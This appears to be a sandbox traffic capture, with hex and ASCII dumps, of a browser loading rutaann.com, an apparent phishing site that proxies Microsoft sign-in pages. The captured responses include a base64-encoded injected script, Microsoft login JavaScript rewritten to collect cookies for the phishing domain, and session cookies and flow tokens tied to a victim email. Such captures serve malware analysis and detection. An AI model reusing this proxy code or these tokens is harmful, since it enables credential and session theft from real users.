                                                        2025-03-25 20:29:46 UTC13818INData Raw: 0d 0a 0d 0a 3c 21 2d 2d 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 20 2d 2d 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 64 61 74 61 3a 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3b 62 61 73 65 36 34 2c 5a 6e 56 75 59 33 52 70 62 32 34 67 59 33 56 7a 64 47 39 74 52 6e 56 75 59 33 52 70 62 32 34 6f 4b 53 42 37 43 69 41 67 49 43 42 70 5a 69 41 6f 49 57 52 76 59 33 56 74 5a 57 35 30 4c 6e 46 31 5a 58 4a 35 55 32 56 73 5a 57 4e 30 62 33 49 6f 49 69 35 6a 64 58 4e 30 62 32 30 74 59 32 78 68 63 33 4d 69 4b 53 42 38 66 43 41 68 5a 47
                                                        Data Ascii: ... Copyright (C) Microsoft Corporation. All rights reserved. --><!DOCTYPE html><html><head><script src="data:text/javascript;base64,ZnVuY3Rpb24gY3VzdG9tRnVuY3Rpb24oKSB7CiAgICBpZiAoIWRvY3VtZW50LnF1ZXJ5U2VsZWN0b3IoIi5jdXN0b20tY2xhc3MiKSB8fCAhZG
                                                        2025-03-25 20:29:46 UTC7713INData Raw: 73 73 22 3a 69 7d 29 7d 2c 4c 2e 41 64 64 46 6f 72 52 65 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 72 29 7b 0a 76 61 72 20 74 3d 65 2e 73 72 63 7c 7c 65 2e 68 72 65 66 7c 7c 22 22 3b 4c 2e 41 64 64 28 74 2c 22 41 64 64 46 6f 72 52 65 6c 6f 61 64 22 2c 65 2e 78 69 6e 74 65 67 72 69 74 79 2c 31 2c 65 2e 74 61 67 4e 61 6d 65 2c 72 29 7d 2c 4c 2e 41 64 64 49 66 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 72 2c 74 29 7b 65 26 26 4c 2e 41 64 64 28 72 2c 74 29 7d 2c 4c 2e 4c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 72 29 7b 68 28 30 2c 65 2c 72 29 7d 7d 76 61 72 20 64 2c 6c 2c 66 3d 77 69 6e 64 6f 77 2c 67 3d 66 2e 64 6f 63 75 6d 65 6e 74 2c 76 3d 22 2e 63 73 73 22 3b 63 2e 4f 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 72 2c 74 29 7b 69 66 28 21 65 29 7b 74 68 72
                                                        Data Ascii: ss":i})},L.AddForReload=function(e,r){var t=e.src||e.href||"";L.Add(t,"AddForReload",e.xintegrity,1,e.tagName,r)},L.AddIf=function(e,r,t){e&&L.Add(r,t)},L.Load=function(e,r){h(0,e,r)}}var d,l,f=window,g=f.document,v=".css";c.On=function(e,r,t){if(!e){thr


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        31192.168.2.449769103.114.43.73443352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 20:29:47 UTC1198OUTGET /aadcdn.msftauth.net/~/shared/1.0/content/js/BssoInterrupt_Core_9810YxmrLqOR1rQ4anyNMg2.js HTTP/1.1
                                                        Host: rutaann.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://rutaann.com/?qrc=john.smith%40microsoft.com
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: qPdM=jYCRkos9k5Z0; qPdM.sig=JtBFZ6EwDNCnYBno_SYUCHnifvY; esctx-x1Q4YHmX7Q=AQABCQEAAABVrSpeuWamRam2jAF1XRQEWZj2fQ7dGK-_JxX9OHqQ2yCGiNwlWOCzJKmxCEEte8mYCgSV5ztuS4rrS9yIybFvLW3OilTD3ukCq_Zy7tmDRFx0WFi5NEghPKriToZsCQDoMeR9ncyPFOGcrJSTKxWCvaLtJqw5HnEBdZkE9U_rhSAA; fpc=Ah-8cUX3klZPh9iRdc8cPP4; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEFFUhOjHU_curTWGESL1hbgmAr-Cseos40vOpPWOwXYTc9UUbYwGF50h8-IldcOMc-E4ioDSHbdRao7xiUZLpiT7ecfB6bAs7xbu40qc3QG-G6zN1Oh__OGbZDYOXAwxgqU5I80Xc68VxC4k7N_9jN1Ksw9bIE-21A_9Q9qBxoYcgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd
                                                        2025-03-25 20:29:47 UTC1242INHTTP/1.1 200 OK
                                                        Content-Type: application/x-javascript
                                                        Content-MD5: R7Y1mgm77mqkG4LgbFphBQ==
                                                        Last-Modified: Wed, 29 Jan 2025 22:54:06 GMT
                                                        ETag: "0x8DD40B7D5C9F36B"
                                                        x-ms-request-id: a6781632-e01e-00bf-3d77-76b6c2000000
                                                        x-ms-version: 2018-03-28
                                                        Access-Control-Expose-Headers: Accept-Ranges,Cache-Control,Content-Encoding,Content-Length,Content-MD5,Content-Type,Date,ETag,Last-Modified,Server,x-ms-request-id,x-ms-version
                                                        Access-Control-Allow-Origin: *
                                                        Cache-Control: public, max-age=27214563
                                                        Date: Tue, 25 Mar 2025 20:29:47 GMT
                                                        Transfer-Encoding: chunked
                                                        Connection: close, Transfer-Encoding
                                                        Akamai-GRN: 0.ca6b1002.1742934587.199c5417
                                                        Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
                                                        2025-03-25 20:29:47 UTC15142INData Raw: 32 32 63 66 63 0d 0a 2f 2a 21 0a 20 2a 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 20 53 54 41 52 54 20 4f 46 20 54 48 49 52 44 20 50 41 52 54 59 20 4e 4f 54 49 43 45 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 20 2a 20 0a 20 2a 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 62 61 73 65 64 20 6f 6e 20 6f 72 20 69 6e 63 6f 72 70 6f 72 61 74 65 73 20 6d 61 74 65 72 69 61 6c 20 66 72 6f 6d 20 74 68 65 20 70 72 6f 6a 65 63 74 73 20 6c 69 73 74 65 64 20 62 65 6c 6f 77 20 28 54 68 69 72 64 20 50 61 72 74 79 20 49 50 29 2e 20 54 68 65 20 6f 72 69 67 69 6e 61 6c 20 63 6f 70 79 72 69 67 68 74 20 6e
                                                        Data Ascii: 22cfc/*! * ------------------------------------------- START OF THIRD PARTY NOTICE ----------------------------------------- * * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright n
                                                        2025-03-25 20:29:47 UTC16384INData Raw: 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 61 62 73 6f 6c 75 74 65 22 2c 65 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 2d 39 39 39 70 78 22 2c 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 29 3b 76 61 72 20 74 3d 5f 2e 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 65 29 2c 6e 3d 74 2e 62 6f 72 64 65 72 4c 65 66 74 43 6f 6c 6f 72 2c 72 3d 74 2e 62 6f 72 64 65 72 52 69 67 68 74 43 6f 6c 6f 72 2c 6f 3d 74 2e 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3b 72 65 74 75 72 6e 20 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 65 29 2c 7b 62 6f 72 64 65 72 4c 65 66 74 43 6f 6c 6f 72 3a 6e 2c 62 6f 72 64 65 72 52 69 67 68 74 43 6f 6c 6f 72 3a 72 2c 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72
                                                        Data Ascii: .style.position="absolute",e.style.top="-999px",document.body.appendChild(e);var t=_.getComputedStyle(e),n=t.borderLeftColor,r=t.borderRightColor,o=t.backgroundColor;return document.body.removeChild(e),{borderLeftColor:n,borderRightColor:r,backgroundColor
                                                        2025-03-25 20:29:48 UTC16384INData Raw: 74 54 69 6d 65 22 2c 44 41 5f 45 58 50 49 52 45 3a 22 44 41 45 78 70 69 72 65 73 22 2c 53 54 53 5f 49 4c 46 54 3a 22 53 54 53 49 6e 6c 69 6e 65 46 6c 6f 77 54 6f 6b 65 6e 22 2c 53 49 47 4e 49 4e 4e 41 4d 45 3a 22 53 69 67 6e 69 6e 4e 61 6d 65 22 2c 46 49 52 53 54 5f 4e 41 4d 45 3a 22 4c 61 73 74 4e 61 6d 65 22 2c 4c 41 53 54 5f 4e 41 4d 45 3a 22 46 69 72 73 74 4e 61 6d 65 22 2c 54 49 4c 45 5f 55 52 4c 3a 22 54 69 6c 65 55 72 6c 22 2c 43 49 44 3a 22 43 49 44 22 2c 50 55 49 44 3a 22 50 55 49 44 22 7d 2c 74 2e 44 45 46 41 55 4c 54 5f 43 48 41 4e 4e 45 4c 5f 49 44 3d 22 35 33 65 65 32 38 34 64 2d 39 32 30 61 2d 34 62 35 39 2d 39 64 33 30 2d 61 36 30 33 31 35 62 32 36 38 33 36 22 2c 74 2e 44 45 46 41 55 4c 54 5f 50 52 45 46 45 52 52 45 44 5f 45 58 54 45 4e 53
                                                        Data Ascii: tTime",DA_EXPIRE:"DAExpires",STS_ILFT:"STSInlineFlowToken",SIGNINNAME:"SigninName",FIRST_NAME:"LastName",LAST_NAME:"FirstName",TILE_URL:"TileUrl",CID:"CID",PUID:"PUID"},t.DEFAULT_CHANNEL_ID="53ee284d-920a-4b59-9d30-a60315b26836",t.DEFAULT_PREFERRED_EXTENS
                                                        2025-03-25 20:29:48 UTC16384INData Raw: 29 0a 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 73 3d 74 68 69 73 7c 7c 28 30 2c 65 76 61 6c 29 28 22 74 68 69 73 22 29 2c 75 3d 73 2e 64 6f 63 75 6d 65 6e 74 2c 63 3d 73 2e 6e 61 76 69 67 61 74 6f 72 2c 6c 3d 73 2e 6a 51 75 65 72 79 2c 64 3d 73 2e 4a 53 4f 4e 3b 6c 7c 7c 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 6a 51 75 65 72 79 7c 7c 28 6c 3d 6a 51 75 65 72 79 29 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 6f 3d 5b 74 2c 6e 5d 2c 28 69 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 72 3d 61 29 3f 72 2e 61 70 70 6c 79 28 74 2c 6f 29 3a 72 29 3d 3d 3d 75 6e 64 65 66 69 6e 65 64 7c 7c 28 65 2e 65 78 70 6f 72 74 73 3d 69 29 7d 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 75 6e 63 74 69 6f 6e 20 6e 28 65 2c
                                                        Data Ascii: ) */!function(a){var s=this||(0,eval)("this"),u=s.document,c=s.navigator,l=s.jQuery,d=s.JSON;l||"undefined"==typeof jQuery||(l=jQuery),function(a){o=[t,n],(i="function"==typeof(r=a)?r.apply(t,o):r)===undefined||(e.exports=i)}((function(e,t){function n(e,
                                                        2025-03-25 20:29:48 UTC16384INData Raw: 2e 6e 6f 74 69 66 79 53 75 62 73 63 72 69 62 65 72 73 3d 69 29 3b 76 61 72 20 63 3d 65 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 73 2e 4a 61 3d 21 31 2c 75 26 26 6f 3d 3d 3d 73 26 26 28 6f 3d 73 2e 6e 63 3f 73 2e 6e 63 28 29 3a 73 28 29 29 3b 76 61 72 20 65 3d 6e 7c 7c 61 26 26 73 2e 73 62 28 72 2c 6f 29 3b 61 3d 6e 3d 74 3d 21 31 2c 65 26 26 73 2e 67 62 28 72 3d 6f 29 7d 29 29 3b 73 2e 71 63 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 6e 26 26 73 2e 4a 61 7c 7c 28 61 3d 21 6e 29 2c 73 2e 65 64 3d 73 2e 55 2e 63 68 61 6e 67 65 2e 73 6c 69 63 65 28 30 29 2c 73 2e 4a 61 3d 74 3d 21 30 2c 6f 3d 65 2c 63 28 29 7d 2c 73 2e 70 63 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 7c 7c 28 72 3d 65 2c 73 2e 67 62 28 65 2c 22 62 65 66 6f 72 65 43 68 61 6e 67 65 22 29 29 7d
                                                        Data Ascii: .notifySubscribers=i);var c=e((function(){s.Ja=!1,u&&o===s&&(o=s.nc?s.nc():s());var e=n||a&&s.sb(r,o);a=n=t=!1,e&&s.gb(r=o)}));s.qc=function(e,n){n&&s.Ja||(a=!n),s.ed=s.U.change.slice(0),s.Ja=t=!0,o=e,c()},s.pc=function(e){t||(r=e,s.gb(e,"beforeChange"))}
                                                        2025-03-25 20:29:48 UTC16384INData Raw: 2b 6e 29 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 72 65 74 75 72 6e 20 6e 2e 6e 65 78 74 53 69 62 6c 69 6e 67 7d 2c 43 64 3a 65 2c 56 64 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 28 65 3d 28 6f 3f 65 2e 74 65 78 74 3a 65 2e 6e 6f 64 65 56 61 6c 75 65 29 2e 6d 61 74 63 68 28 69 29 29 3f 65 5b 31 5d 3a 6e 75 6c 6c 7d 2c 53 63 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 69 66 28 73 5b 53 2e 61 2e 52 28 6e 29 5d 29 7b 76 61 72 20 6f 3d 6e 2e 66 69 72 73 74 43 68 69 6c 64 3b 69 66 28 6f 29 64 6f 7b 69 66 28 31 3d 3d 3d 6f 2e 6e 6f 64 65 54 79 70 65 29 7b 76 61 72 20 69 2c 61 3d 6e 75 6c 6c 3b 69 66 28 69 3d 6f 2e 66 69 72 73 74 43 68 69 6c 64 29 64 6f 7b 69 66 28 61 29 61 2e 70 75 73 68 28 69 29 3b 65 6c 73 65 20 69 66 28 65 28 69 29 29 7b 76 61 72 20
                                                        Data Ascii: +n);return null}return n.nextSibling},Cd:e,Vd:function(e){return(e=(o?e.text:e.nodeValue).match(i))?e[1]:null},Sc:function(n){if(s[S.a.R(n)]){var o=n.firstChild;if(o)do{if(1===o.nodeType){var i,a=null;if(i=o.firstChild)do{if(a)a.push(i);else if(e(i)){var
                                                        2025-03-25 20:29:48 UTC16384INData Raw: 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 63 6f 6e 74 72 6f 6c 73 44 65 73 63 65 6e 64 61 6e 74 42 69 6e 64 69 6e 67 73 3a 21 30 7d 7d 2c 75 70 64 61 74 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 53 2e 61 2e 66 63 28 65 2c 74 28 29 29 7d 7d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 2c 6e 29 7b 53 2e 63 5b 65 5d 3d 7b 69 6e 69 74 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 72 2c 6f 2c 69 2c 61 29 7b 76 61 72 20 73 2c 75 2c 63 2c 6c 2c 64 2c 66 3d 7b 7d 3b 69 66 28 74 29 7b 69 3d 6f 2e 67 65 74 28 22 61 73 22 29 3b 76 61 72 20 70 3d 6f 2e 67 65 74 28 22 6e 6f 43 68 69 6c 64 43 6f 6e 74 65 78 74 22 29 3b 66 3d 7b 61 73 3a 69 2c 6e 6f 43 68 69 6c 64 43 6f 6e 74 65 78 74 3a 70 2c 65 78 70 6f 72 74 44 65 70 65 6e 64 65 6e
                                                        Data Ascii: nction(){return{controlsDescendantBindings:!0}},update:function(e,t){S.a.fc(e,t())}},function(){function e(e,t,n){S.c[e]={init:function(e,r,o,i,a){var s,u,c,l,d,f={};if(t){i=o.get("as");var p=o.get("noChildContext");f={as:i,noChildContext:p,exportDependen
                                                        2025-03-25 20:29:48 UTC16384INData Raw: 3d 6e 75 6c 6c 3a 54 2e 70 75 73 68 28 70 29 29 2c 70 26 26 77 2e 70 75 73 68 2e 61 70 70 6c 79 28 77 2c 70 2e 59 29 29 29 2c 43 2b 2b 3b 62 72 65 61 6b 3b 63 61 73 65 22 61 64 64 65 64 22 3a 66 6f 72 28 3b 45 3c 6b 3b 29 64 28 43 2b 2b 29 3b 44 21 3d 3d 61 3f 28 50 2e 70 75 73 68 28 79 2e 6c 65 6e 67 74 68 29 2c 64 28 44 29 29 3a 6c 28 4e 2e 76 61 6c 75 65 29 7d 66 6f 72 28 3b 45 3c 6f 2e 6c 65 6e 67 74 68 3b 29 64 28 43 2b 2b 29 3b 79 2e 5f 63 6f 75 6e 74 57 61 69 74 69 6e 67 46 6f 72 52 65 6d 6f 76 65 3d 78 7d 53 2e 61 2e 67 2e 73 65 74 28 72 2c 74 2c 79 29 2c 66 28 73 2e 62 65 66 6f 72 65 4d 6f 76 65 2c 41 29 2c 53 2e 61 2e 44 28 77 2c 73 2e 62 65 66 6f 72 65 52 65 6d 6f 76 65 3f 53 2e 6f 61 3a 53 2e 72 65 6d 6f 76 65 4e 6f 64 65 29 3b 74 72 79 7b 6d
                                                        Data Ascii: =null:T.push(p)),p&&w.push.apply(w,p.Y))),C++;break;case"added":for(;E<k;)d(C++);D!==a?(P.push(y.length),d(D)):l(N.value)}for(;E<o.length;)d(C++);y._countWaitingForRemove=x}S.a.g.set(r,t,y),f(s.beforeMove,A),S.a.D(w,s.beforeRemove?S.oa:S.removeNode);try{m
                                                        2025-03-25 20:29:48 UTC12772INData Raw: 66 79 28 6e 29 29 29 3a 62 28 22 55 73 65 72 20 6c 69 73 74 20 69 73 20 65 6d 70 74 79 2e 22 29 3b 72 65 74 75 72 6e 20 6e 7d 28 65 2e 75 73 65 72 4c 69 73 74 2c 74 29 3b 72 65 74 75 72 6e 20 6e 2e 6c 65 6e 67 74 68 3e 30 3f 7b 6e 65 77 53 65 73 73 69 6f 6e 73 3a 6e 7d 3a 73 2e 72 65 6a 65 63 74 28 22 6e 6f 55 73 65 72 73 22 29 7d 7d 29 29 7d 28 29 3a 22 63 68 72 6f 6d 65 22 3d 3d 3d 61 26 26 28 65 3d 6e 65 77 20 75 28 7b 6c 6f 67 4d 65 73 73 61 67 65 3a 62 2c 6c 6f 67 44 61 74 61 50 6f 69 6e 74 3a 79 7d 2c 6e 2e 6e 6f 6e 6f 6e 63 65 2c 22 72 75 74 61 61 6e 6e 2e 63 6f 6d 22 2c 6f 2c 69 29 2e 67 65 74 43 6f 6f 6b 69 65 73 41 73 79 6e 63 28 29 2e 74 68 65 6e 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 7c 7c 21 65 2e 6c 65 6e 67 74 68 29 72 65
                                                        Data Ascii: fy(n))):b("User list is empty.");return n}(e.userList,t);return n.length>0?{newSessions:n}:s.reject("noUsers")}}))}():"chrome"===a&&(e=new u({logMessage:b,logDataPoint:y},n.nononce,"rutaann.com",o,i).getCookiesAsync().then((function(e){if(!e||!e.length)re


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        32192.168.2.449775103.114.43.73443352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 20:29:49 UTC1363OUTGET /?qrc=john.smith%40microsoft.com&sso_reload=true HTTP/1.1
                                                        Host: rutaann.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        sec-ch-ua-platform: "Windows"
                                                        Upgrade-Insecure-Requests: 1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: navigate
                                                        Sec-Fetch-Dest: document
                                                        Referer: https://rutaann.com/?qrc=john.smith%40microsoft.com
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: qPdM=jYCRkos9k5Z0; qPdM.sig=JtBFZ6EwDNCnYBno_SYUCHnifvY; esctx-x1Q4YHmX7Q=AQABCQEAAABVrSpeuWamRam2jAF1XRQEWZj2fQ7dGK-_JxX9OHqQ2yCGiNwlWOCzJKmxCEEte8mYCgSV5ztuS4rrS9yIybFvLW3OilTD3ukCq_Zy7tmDRFx0WFi5NEghPKriToZsCQDoMeR9ncyPFOGcrJSTKxWCvaLtJqw5HnEBdZkE9U_rhSAA; fpc=Ah-8cUX3klZPh9iRdc8cPP4; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEFFUhOjHU_curTWGESL1hbgmAr-Cseos40vOpPWOwXYTc9UUbYwGF50h8-IldcOMc-E4ioDSHbdRao7xiUZLpiT7ecfB6bAs7xbu40qc3QG-G6zN1Oh__OGbZDYOXAwxgqU5I80Xc68VxC4k7N_9jN1Ksw9bIE-21A_9Q9qBxoYcgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1
                                                        2025-03-25 20:29:49 UTC3751INHTTP/1.1 302 Found
                                                        Cache-Control: no-store, no-cache
                                                        Pragma: no-cache
                                                        Content-Type: text/html; charset=utf-8
                                                        Expires: -1
                                                        Location: https://rutaann.com/?5cugphbw6=aHR0cHM6Ly9tc2Z0LnN0cy5taWNyb3NvZnQuY29tL2FkZnMvbHMvP2xvZ2luX2hpbnQ9am9obi5zbWl0aCU0MG1pY3Jvc29mdC5jb20mY2xpZW50LXJlcXVlc3QtaWQ9ZGE5OTZiMmUtNjc1Mi00YmQ2LWFiOGYtYWQ5MGZjNWJhZTY4JnVzZXJuYW1lPWpvaG4uc21pdGglNDBtaWNyb3NvZnQuY29tJndhPXdzaWduaW4xLjAmd3RyZWFsbT11cm4lM2FmZWRlcmF0aW9uJTNhTWljcm9zb2Z0T25saW5lJndjdHg9ZXN0c3JlZGlyZWN0JTNkMiUyNmVzdHNyZXF1ZXN0JTNkclFRSUFSQUE0Mkt3MHNrb0tTa290dExYTDhndktrbk0wY3ZOVEM3S0w4NVBLOG5QeThuTVM5Vkx6c19WeXk5S3owd0JzWXFFdUFUMHNtZmVDa3FfNXIyNmYtMkVQOUhyTWxZeEtoTTJRdjhDSS1NTFJzWkpUQkpaLVJsNWVzVzVtU1VaRG5CMUlCVzNtQVQ5aTlJOVU4S0wzVkpUVW9zU1N6THo4eTZ3Q0x4aTRURmd0dUxnNEJKZ2tHQlFZUGpCd3JpSUZlaUkxd2RfTG4xYzlkdXJzZjhQTzFPZkM4TXBWbjB2VV9PQXN2THlFUGRNUzljQTR4UnZ2Mnh2Ri05RWt4RF9TaU5YbHlxWHBDZ2ZSd196aUh5TGN0TlFXd3Nyd3dsc1FoUFltRTZ4TVh4Z1kteGdaNWpGem5DQWtfRUFMOE1QdnRXblZsemU4X3ZXTzQ4TkFnd1BCQmdBMCM=
                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                        P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                        x-ms-request-id: a5f9c1eb-7ae3-4afb-818f-fc07028e4400
                                                        x-ms-ests-server: 2.1.20329.5 - WEULR1 ProdSlices
                                                        nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                        x-ms-srs: 1.P
                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                        Content-Security-Policy-Report-Only: object-src 'none'; base-uri 'self'; script-src 'self' 'nonce-lEtGavtLa5P3LWrn-w5s3A' 'unsafe-inline' 'unsafe-eval' https://*.msauth.net https://*.msftauth.net https://*.msftauthimages.net https://*.msauthimages.net https://*.msidentity.com https://*.microsoftonline-p.com https://*.microsoftazuread-sso.com https://*.azureedge.net https://*.outlook.com https://*.office.com https://*.office365.com https://*.microsoft.com https://*.bing.com 'report-sample'; report-uri https://csp.microsoft.com/report/ESTS-UX-All
                                                        Set-Cookie: buid=1.AQoAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAAKAA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEiJYeYalAAVl3PxPvLe92WUyJQG-00-bDdyt4U5gvvctc__S4jhyXqSVwbtaNdT-hCRkYvtvLiPTlhOrlf1F8Ji03vGRNKUTAFYHnXbgo9UAgAA; expires=Thu, 24-Apr-2025 20:29:49 GMT; path=/; secure; HttpOnly; SameSite=None
                                                        Set-Cookie: ESTSWCTXFLOWTOKEN=AQABIQEAAABVrSpeuWamRam2jAF1XRQEcUeYHkXBwbpOjpfmrw1uEj9uFj_RNrxrvyBdMR-ZRy-zj0-R1puIn96jDjWIZkvzpE5Aeup7hbhxbvYm-Zx4L2h9fKoyTwKmGDdQrkOZOe16nW5CTa_kCyMU8zaji9tfWdbevmAE-CscYD9ChsFZzZlk5WdxNltcmuOZ8l9Vcg1Ijg5UcFAdFeSeT4EuvEqPrgSbbanBGwSM8_I6JXOi-TE6X2O8xKzueATAbiaU4sBIuui8bpr0BdmOJsZE8DLOr4A8-7OQfHuzzeJtwCnnQVBrMnFBJY0NjIqt5DVhmZmqdFyng9aIxrFbOVTJiLgkMF8heP3Q4-tGzh20V7mxxPVDY7R50Fh2BVu_pVg7sgztfUzauHNmnPbowN57PXvVBZutfRph9QjqxwKZKDUVW476RoLk_KTMUwP9xV91SjrD2Tsa2BS0VGJiZxyC_0H51_uh3sOoA7x1qwzjDa0Tyw7rE-3MTJcS3FLo2xnN4GMX_nnnUWLqrFrArT4lbFZKIAA; domain=rutaann.com; path=/; secure; HttpOnly; SameSite=None
                                                        Set-Cookie: fpc=Ah-8cUX3klZPh9iRdc8cPP64vjNwAQAAADwJdd8OAAAA; expires=Thu, 24-Apr-2025 20:29:49 GMT; path=/; secure; HttpOnly; SameSite=None
                                                        Set-Cookie: x-ms-gateway-slice=estsfd; path=/; secure; samesite=none; httponly
                                                        Date: Tue, 25 Mar 2025 20:29:48 GMT
                                                        Connection: close
                                                        content-length: 1565
                                                        Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
                                                        2025-03-25 20:29:49 UTC1565INData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 64 61 74 61 3a 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3b 62 61 73 65 36 34 2c 5a 6e 56 75 59 33 52 70 62 32 34 67 59 33 56 7a 64 47 39 74 52 6e 56 75 59 33 52 70 62 32 34 6f 4b 53 42 37 43 69 41 67 49 43 42 70 5a 69 41 6f 49 57 52 76 59 33 56 74 5a 57 35 30 4c 6e 46 31 5a 58 4a 35 55 32 56 73 5a 57 4e 30 62 33 49 6f 49 69 35 6a 64 58 4e 30 62 32 30 74 59 32 78 68 63 33 4d 69 4b 53 42 38 66 43 41 68 5a 47 39 6a 64 57 31 6c 62 6e 51 75 63 58 56 6c 63 6e 6c 54 5a 57 78 6c 59 33 52 76 63 69 67 69 4c 6e 4a 76 64 47 46 30 5a 53 31 6a 62 47 46 7a 63 79 49 70 4b 53 42 37 43 69 41 67 49 43 41 67 49 43 41 67 64 6d 46 79 49 47 35 6c 64 30 52 70 64 69 41 39 49 47 52 76 59 33 56 74 5a
